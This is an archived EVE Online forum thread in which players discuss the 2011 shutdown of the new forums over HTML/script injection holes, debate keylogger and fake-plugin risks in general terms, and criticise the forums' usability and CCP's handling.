EVE Search - New EVE Online forums temporarily disabled

All Channels

EVE General Discussion

New EVE Online forums temporarily disabled

» Click here to find additional results for this topic using Google

Monitor this thread via RSS [?]

Pages: 1 2 3 4 5 6 7 8 9 [10] 11 12 13 14 15 16 17 18 19 20 .. 27 :: one page
Author	Thread Statistics \| Show CCP posts - 36 post(s)
Grimpak Gallente The Whitehound Corporation Frontline Assembly Point	Posted - 2011.04.10 11:04:00 - [271] Edited by: Grimpak on 10/04/2011 11:04:51 Originally by: dexington Originally by: Bomberlocks The problem is that an injected keylogger could conceivably get hold of your forum username and password. Not going to happen without the user downloading and installing the program, you can¦t just inject a running keylogger using html. Unless the attack is exploiting over security hole in the browser, it would be much the same as linking url to malware on this forum. Quote: The new EVE forums need a special plugin to read them. Install? <yes> <no>. I think this type of attack is conceivable with the html vulnerabilities that existed on the forum. --- Quote: The more I know about humans, the more I love animals. ain't that right.
dexington Caldari Baconoration	Posted - 2011.04.10 11:18:00 - [272] Edited by: dexington on 10/04/2011 11:19:45 Originally by: Grimpak Quote: The new EVE forums need a special plugin to read them. Install? <yes> <no>. I think this type of attack is conceivable with the html vulnerabilities that existed on the forum. Even if this is possible you would still need to download the software from another server, and run it yourself. Their would be not automated installation and execution of the keylogger.
Kerfira Kerfira Corp	Posted - 2011.04.10 11:23:00 - [273] Edited by: Kerfira on 10/04/2011 11:25:22 Originally by: dexington Even if this is possible you would still need to download the software from another server, and run it yourself. Their would be not automated installation and execution of the keylogger. Given the average internet knowledge of people, how many would press 'Yes' to the 'Request to Install EVE Forum Search plugin' popup? That the security holes even allowed something like that to BE there would be enough to seriously compromise a lot of peoples accounts... ...and them of course there are all the usability problems on top... Originally by: CCP Wrangler EVE isn't designed to just look like a cold, dark and harsh world, it's designed to be a cold, dark and harsh world.
simocast Minmatar Razorback Industrial	Posted - 2011.04.10 11:26:00 - [274] Keep these old forums... I mean having a "like" feature and the fact the forums are annoying to read is a deal breaker.
Calathea Sata State War Academy	Posted - 2011.04.10 11:30:00 - [275] I too along with many others (in fact MOST of the forum users) would like to keep the old forums.
Akita T Caldari Navy Volunteer Task Force	Posted - 2011.04.10 11:41:00 - [276] Originally by: Spyke BlackIce I usually keep my arse out of whine-fests, troll parades, and general rock throwing, but this fiasco warrants grabbing my pitchfork and joining the mob if only because of the fact that after the two test runs of the new forums, they were released not only with HUGE, wide-open security problems, but little if any of the testers' feedback was heeded. I took part in the first test run (unfortunately I couldn't find enough time due to RL issues to help with the second) but when the forums opened, I could only find a miniscule few examples of the user feedback actually being used. Why bother with tests CCP, if our input is thrown out and disregarded along with the garbage? It is becoming obvious that someone in upper management doesn't have a clue. They want their new toys - the way it was designed, regardless of flaws and lack of features - out the door and to hell with what the customer wants, needs, envisions, or finds lacking, and worse, to hell with the silly 'polished' idea. "Get it out so that we can move onto the next new toy and we'll finish fixing it later (maybe)", seems to be this person's (or persons') motto. I actually have a lot of respect for most of the dev teams at CCP, and I applaud their apology and acknowledgement of the problem here as well as their dropping back and punting the old forums into service again. Many companies (no cough S.O.E cough names here) would have taken the stoic, we-know-best-and-you-couldn't-grasp-the-issues route by simply reopening the old forums with a message along the lines of "Due to technical issues, we will be using the old forums until further notice." and that would be that. I'm not implying that the web team should not be tarred-and-feathered for this MAJOR coding ineptitude they called a forum, but I seriously believe the issue began and ended in the top echelon of management. Something this bad quite frankly should not have happened, not even in the devs' worse nightmares. The issue HAD to be a time/deadline/personnel squeeze. Plain and simple. Quoted it all because it bears repeating several times over. CCP needs to change its company leadership mindset. The notion that "new features sell, polished content doesn't" will be the doom of EVE if it persists much longer. _ Make ISK\|\|Build\|\|React\|\|1k papercuts _
Bomberlocks Minmatar CTRL-Q	Posted - 2011.04.10 11:49:00 - [277] Originally by: dexington Originally by: Bomberlocks The problem is that an injected keylogger could conceivably get hold of your forum username and password. Not going to happen without the user downloading and installing the program, you can¦t just inject a running keylogger using html. Unless the attack is exploiting over security hole in the browser, it would be much the same as linking url to malware on this forum. You don't need to download any software since the keylogger is done in javascript. The problem is posting that info to another domain which the security model normally will not allow. However, there are ways around this, using either flash raw sockets, cookies or iframes (or perhaps other methods that I don't know about as I haven't coded any js in the last two years). You could conceivably redirect the entire page to another site after the user has entered his credentials and then send it back. All this depends on a number of things I'm not up to speed on, but when I did used to code for banks some years ago, I was up to speed on things like this and my code would have to be pretty thoroughly reviewed before being implemented.
William Henry McGregor	Posted - 2011.04.10 11:55:00 - [278] Originally by: Ban Doga Looks like there isn't even someone to review the security concept. "... and then the server uses the character ID provided by the client to add the posting ..." should make someone fall out of their chair even without looking at any code at all. Same with "... if a thread is locked the client will not show buttons to "like" postings, that'll suffice". People are really fast to argue on the code level ("I don't review code", "It's just x lines of code", ...) when most of the problems are really on the conceptual level. IMO that suggest people are still struggling to get the code to do what they want and cannot even start to think about whether their concept makes sense (or not). The new forum was "Broken by Design"(c)(TM) - same as this SpaceBook thingy. CCP better moves from "new and shiny" "hype" to quality - but excellence is where they failed!
dexington Caldari Baconoration	Posted - 2011.04.10 11:58:00 - [279] Originally by: Kerfira Given the average internet knowledge of people, how many would press 'Yes' to the 'Request to Install EVE Forum Search plugin' popup? That the security holes even allowed something like that to BE there would be enough to seriously compromise a lot of peoples accounts... Probably not as many as you think, everyone is so paranoid over getting hacked that a lot of people in fact do double check unexpected install options. Within the first 5 people seeing the popup, i'm sure at least one of them would notice something is wrong. After that the window of opportunity is more or less closed, as people would start to warn about something not being right. It is problem that you could inject html into the page, and it does open up for some types of attack chains. On the other hand it's not something that is easily exploited to gain full system access, it's a ncommon type of security flaw and it is considered a minor one.
Grimpak Gallente The Whitehound Corporation Frontline Assembly Point	Posted - 2011.04.10 12:02:00 - [280] Originally by: dexington Originally by: Kerfira Given the average internet knowledge of people, how many would press 'Yes' to the 'Request to Install EVE Forum Search plugin' popup? That the security holes even allowed something like that to BE there would be enough to seriously compromise a lot of peoples accounts... Probably not as many as you think, everyone is so paranoid over getting hacked that a lot of people in fact do double check unexpected install options. Within the first 5 people seeing the popup, i'm sure at least one of them would notice something is wrong. After that the window of opportunity is more or less closed, as people would start to warn about something not being right. It is problem that you could inject html into the page, and it does open up for some types of attack chains. On the other hand it's not something that is easily exploited to gain full system access, it's a ncommon type of security flaw and it is considered a minor one. risk is still there tho, and that tickles many people's paranoia nerve, as well as scares people away. --- Quote: The more I know about humans, the more I love animals. ain't that right.
dexington Caldari Baconoration	Posted - 2011.04.10 12:10:00 - [281] Originally by: Bomberlocks You don't need to download any software since the keylogger is done in javascript. Was anyone able to inject js code?, i didn't see anything working except html.
Vaerah Vahrokha Minmatar Vahrokh Consulting	Posted - 2011.04.10 12:15:00 - [282] Quote: So basically what you are saying is if we used the new forums, our account details were exposed? Including credit card information? Yeah ok. Between the anomaly nerf and CCP exposing everyone's account details including credit cards, I quit. This is just unacceptable. Great job CCP. I trusted you and this is how you treat your customers. Time to spend my money on another game that doesn't expose my information. No, it's much worse. I was just wondering why Avira kept telling me that I was to download an infected page.... Now, if you got a troyan, you can stop playing EvE TODAY and still all your future credit card and log in information of everything you do, are being sent to some pirate site for their perusal. You will thank CCP and the web "masters" they used to (fail to) copy the open source forum they used, for your money losses and for that maybe sue them. Auditing \| Research \| 3rd Party \| Collateral Holding \| EvE RL Charity
Kerfira Kerfira Corp	Posted - 2011.04.10 12:16:00 - [283] Originally by: dexington Probably not as many as you think, everyone is so paranoid over getting hacked that a lot of people in fact do double check unexpected install options. Within the first 5 people seeing the popup, i'm sure at least one of them would notice something is wrong. After that the window of opportunity is more or less closed, as people would start to warn about something not being right. The average internet user is PERFECTLY able to ignore warnings Also bear in mind that most people are actually not really complaining about the missing security... but about the general usability of the new forums... Quite frankly... They sucked! Originally by: CCP Wrangler EVE isn't designed to just look like a cold, dark and harsh world, it's designed to be a cold, dark and harsh world.
Bomberlocks Minmatar CTRL-Q	Posted - 2011.04.10 12:22:00 - [284] Originally by: dexington Originally by: Bomberlocks You don't need to download any software since the keylogger is done in javascript. Was anyone able to inject js code?, i didn't see anything working except html. How do you think the html was injected?

CCP Navigator C C P C C P Alliance	Posted - 2011.04.10 12:23:00 - [285] Thread has been cleaned up a little. I wanted to quickly address one or two concerns, specifically over personal information and logins. At no stage were other players able to access your login, passwords, payment details or real life information. CCP Sreegs has already stated that he is writing a blog on this subject and this is one of the things he will cover. Navigator Lead Community Representative CCP Hf, EVE Online

dexington Caldari Baconoration	Posted - 2011.04.10 12:37:00 - [286] Originally by: Bomberlocks Originally by: dexington Originally by: Bomberlocks You don't need to download any software since the keylogger is done in javascript. Was anyone able to inject js code?, i didn't see anything working except html. How do you think the html was injected? You make it sound like js was used to inject html, how do you inject js when you can't inject html?
Turix Interstellar eXodus BricK sQuAD.	Posted - 2011.04.10 12:38:00 - [287] Originally by: CCP Navigator Thread has been cleaned up a little. I wanted to quickly address one or two concerns, specifically over personal information and logins. At no stage were other players able to access your login, passwords, payment details or real life information. CCP Sreegs has already stated that he is writing a blog on this subject and this is one of the things he will cover. This doesn't appear to be the issue most people are concerned about. There appears to be much more concern over the design style and decisions made when implementing the new forums; consensus seems to be that people simply don't like them (See the threads in General Discussion/Assembly Hall). __________________________
Mag's the united Negative Ten.	Posted - 2011.04.10 12:42:00 - [288] Originally by: CCP Navigator Thread has been cleaned up a little. I wanted to quickly address one or two concerns, specifically over personal information and logins. At no stage were other players able to access your login, passwords, payment details or real life information. CCP Sreegs has already stated that he is writing a blog on this subject and this is one of the things he will cover. You've missed the point, again. Your massive forum fu failure allowed for bad script injection. Sure the chance of anyone gaining any info was small, but there was still a chance. Originally by: Allestin Villimar Also, if your bookmarks are too far out, they can and will ban you for it. Originally by: Torothanax Low population in w systems makes afk cloaking unattractive.
Bomberlocks Minmatar CTRL-Q	Posted - 2011.04.10 12:43:00 - [289] Originally by: CCP Navigator Thread has been cleaned up a little. I wanted to quickly address one or two concerns, specifically over personal information and logins. At no stage were other players able to access your login, passwords, payment details or real life information. CCP Sreegs has already stated that he is writing a blog on this subject and this is one of the things he will cover. I would like to post a few pertinent facts: - The person who was banned petitioned the vulnerability to CCP. It was not acted upon. - Said person then proceeded to demonstrate that vulnerability after discussing it on the now-defunct SHC forums. - Said person was banned for impersonating someone who was not himself. - The forums were taken down. - The forums were brought back up and CCP Fallout asserted that the vulnerabilities had been patched and "We would like to reiterate that your personal details and billing information have not been compromised, and that your eve online account was not at risk". - The banned person then proceed to post, as himself, inspite of him being banned, in reply to CCP Fallout's assertion, thereby proving Fallout's assertion to be false. - The forums were then taken down again. - The forums brought back up a while later. - Later on, I presume after having discovered that the forums were still vulnerable, they were taken down again. - The old forums were brought back up. - Discussions involving said banned person are closed with further threats of banning, ignoring the fact that the story has already been widely spread, on other forums, Facebook, twitter and probably the media as well (slashdot for example). - You now claim, again, that customer data was never at risk. In light of that information, how do you expect us to believe your current assertion without a transparent and open discussion of the vulnerability? The banned person can easily post his version any else he chooses, and given his disproving of CCP's earlier assertions, I presume that the benefit of the doubt will go to him. The ball, I think, is in your court.
Phocas Lebournes Northbridge Services Group	Posted - 2011.04.10 12:46:00 - [290] Originally by: CCP Navigator Thread has been cleaned up a little. I wanted to quickly address one or two concerns, specifically over personal information and logins. At no stage were other players able to access your login, passwords, payment details or real life information. CCP Sreegs has already stated that he is writing a blog on this subject and this is one of the things he will cover. Thank you for making this clear. So no need to change the passwords if someone used the new forums, right?
Ban Doga	Posted - 2011.04.10 12:53:00 - [291] Originally by: CCP Navigator Thread has been cleaned up a little. I wanted to quickly address one or two concerns, specifically over personal information and logins. At no stage were other players able to access your login, passwords, payment details or real life information. CCP Sreegs has already stated that he is writing a blog on this subject and this is one of the things he will cover. Are you sure? Scratch that, you were probably sure the new forums were ready to be rolled out too. Are you saying at no time someone was able to access my personal information stored on CCP's systems? Or are you saying no one injected a keylogger/trojan/malware executing/downloading/installing signature that could access information on the forum users' system(s)?

CCP Navigator C C P C C P Alliance	Posted - 2011.04.10 12:53:00 - [292] Originally by: Phocas Lebournes Originally by: CCP Navigator Thread has been cleaned up a little. I wanted to quickly address one or two concerns, specifically over personal information and logins. At no stage were other players able to access your login, passwords, payment details or real life information. CCP Sreegs has already stated that he is writing a blog on this subject and this is one of the things he will cover. Thank you for making this clear. So no need to change the passwords if someone used the new forums, right? That is right. Your login and password would not have been compromised. It should also be noted though that it is just good practice to change your passwords regularly Navigator Lead Community Representative CCP Hf, EVE Online

Phocas Lebournes Northbridge Services Group	Posted - 2011.04.10 12:57:00 - [293] Originally by: CCP Navigator Originally by: Phocas Lebournes Originally by: CCP Navigator Thread has been cleaned up a little. I wanted to quickly address one or two concerns, specifically over personal information and logins. At no stage were other players able to access your login, passwords, payment details or real life information. CCP Sreegs has already stated that he is writing a blog on this subject and this is one of the things he will cover. Thank you for making this clear. So no need to change the passwords if someone used the new forums, right? That is right. Your login and password would not have been compromised. It should also be noted though that it is just good practice to change your passwords regularly Cheers, in that case I am a happy chappy again. :)
Bomberlocks Minmatar CTRL-Q	Posted - 2011.04.10 12:57:00 - [294] Originally by: CCP Navigator Originally by: Phocas Lebournes Originally by: CCP Navigator Thread has been cleaned up a little. I wanted to quickly address one or two concerns, specifically over personal information and logins. At no stage were other players able to access your login, passwords, payment details or real life information. CCP Sreegs has already stated that he is writing a blog on this subject and this is one of the things he will cover. Thank you for making this clear. So no need to change the passwords if someone used the new forums, right? That is right. Your login and password would not have been compromised. It should also be noted though that it is just good practice to change your passwords regularly I'm sorry, I don't believe you. There was a sample exploit on another forum showing exactly how easy it would be to inject a keylogger. However, as you will obviously ban any discussion of that exploit, it is impossible to discuss it here and you leave it to people with less than honourable intentions to discuss it elsewhere.
Mag's the united Negative Ten.	Posted - 2011.04.10 13:08:00 - [295] Originally by: CCP Navigator Originally by: Phocas Lebournes Thank you for making this clear. So no need to change the passwords if someone used the new forums, right? That is right. Your login and password would not have been compromised. It should also be noted though that it is just good practice to change your passwords regularly If you're as confident about this as you were about the new forums, everything should be fine yea? Originally by: Allestin Villimar Also, if your bookmarks are too far out, they can and will ban you for it. Originally by: Torothanax Low population in w systems makes afk cloaking unattractive.
Ellen Woods	Posted - 2011.04.10 13:10:00 - [296] Please, keep the new forum offline forever. The new forum is pain to read, oversized portraits, bad layout... This old forum is much smoother and comfortable to read, and imo it matters.
Calathea Sata State War Academy	Posted - 2011.04.10 13:18:00 - [297] Originally by: Ellen Woods Please, keep the new forum offline forever. The new forum is pain to read, oversized portraits, bad layout... This old forum is much smoother and comfortable to read, and imo it matters. Agreed. Now that I have tried both of them I can honestly say I will be much more happier with the old forums because of all the reasons people have stated. Also the two minute timer does a good job of keeping the posts more intellectual and free from redundant jubberish. Also Verdana > Arial. Keep the old forums pls.

CCP Sreegs	Posted - 2011.04.10 13:24:00 - [298] Originally by: Steve Thomas Originally by: CCP Sreegs Edited by: CCP Sreegs on 10/04/2011 03:10:15 Originally by: Marconus Orion Originally by: Trocent I really wish these whiners were real programmers. They'd know how strange problems arise. Out of all the MMOs I played CCP still does a hell of a lot better than anyone else. Also to all you whiners, remember that CCP could always make this a carebear game. That'd probably get a few million subscriptions and make a ton more money, but they don't. Feel grateful or leave. Some of these people complaining are programmers. The same people who pointed out the problems before it went live. CCP just ignored them and shoved it out to the customers so they could say they Delivered. If you have any evidence of this I'd welcome you to share it with me. [email protected] I can save you the time, on this forum thread you have one IT systems developer who works for Kinder*Morgan Pipelines, two Web content developers from CITIgroup and a Network system specialist for The Clydesdale Bank PLC UK. now how many of them actualy ARE in thoes feilds is a matter of speculation. after all you can say whatever you like in facebook. I'm sure a lot of people work for a lot of good companies. What I was stating was that if anyone has an actual evidence of the malfeasance that was suggested they're welcome to email it to me.

Darth Vapour	Posted - 2011.04.10 13:26:00 - [299] Originally by: CCP Sreegs I'm sure a lot of people work for a lot of good companies. What I was stating was that if anyone has an actual evidence of the malfeasance that was suggested they're welcome to email it to me. Those responsible are working in the same building as you are.

CCP Sreegs	Posted - 2011.04.10 13:26:00 - [300] Originally by: Kerfira Edited by: Kerfira on 10/04/2011 08:53:07 Originally by: CCP Sreegs Just to keep you guys who weren't in the loop aware there will still be a security-related blog about the forum issues Monday or so. Now with BONUS CONTENT! Sorry, but to me this (and the post after it) smells like CCP are pretending that the ONLY problems with the new forums were the security issues, and are deliberately ignoring all the other usability issues... If this is the case, then you really, REALLY(!) should take a step back and think a bit about the image you present to your customers. The new forums were horrible to read, wasted a shedload of bandwidth (especially on mobile devices which is what a lot of people use these days), lacked very basic functionality that the current forums have, and were horribly slow. In short, they were, and ARE, not ready for live deployment! As one previous poster in this thread said, compare it with the introduction of the new contracts search... That was also a complete new interface, and I don't think I've seen a single complaint over it. Why? Because it replaced something BAD with something OK (still not 'good'). With the forums, you're replacing OK with BAD. No wonder people complain... My job is security therefore that's what I blog about. The reason we shut down the forums was security related.


Pages: 1 2 3 4 5 6 7 8 9 [10] 11 12 13 14 15 16 17 18 19 20 .. 27 :: one page
First page \| Previous page \| Next page \| Last page

COPYRIGHT NOTICE
EVE Online, the EVE logo, EVE and all associated logos and designs are the intellectual property of CCP hf. All artwork, screenshots, characters, vehicles, storylines, world facts or other recognizable features of the intellectual property relating to these trademarks are likewise the intellectual property of CCP hf. EVE Online and the EVE logo are the registered trademarks of CCP hf. All rights are reserved worldwide. All other trademarks are the property of their respective owners. CCP hf. has granted permission to EVE-Search.com to use EVE Online and all associated logos and designs for promotional and information purposes on its website but does not endorse, and is not in any way affiliated with, EVE-Search.com. CCP is in no way responsible for the content on or functioning of this website, nor can it be liable for any damage arising from the use of this website.